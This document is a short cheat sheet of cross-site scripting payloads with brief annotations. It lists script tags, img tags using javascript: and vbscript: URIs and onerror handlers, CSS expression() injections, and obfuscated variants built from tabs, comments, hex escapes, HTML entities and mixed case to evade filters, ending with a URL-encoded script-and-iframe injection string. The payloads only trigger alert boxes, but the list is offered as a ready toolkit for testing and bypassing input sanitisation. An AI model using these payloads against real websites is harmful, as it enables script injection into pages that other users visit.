<script>alert("跨站")</script> (most commonly used)
<img src=javascript:alert("跨站")></img>
<img src="javascript: alert(/跨站/)></img>
<img src="javas????cript:alert(/跨站/)" width=150></img> (the ???? marks whitespace inserted with the Tab key)
<img src="#" onerror=alert(/跨站/)></img>
<img src="#" style="xss:expression(alert(/xss/));"></img>
<img src="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["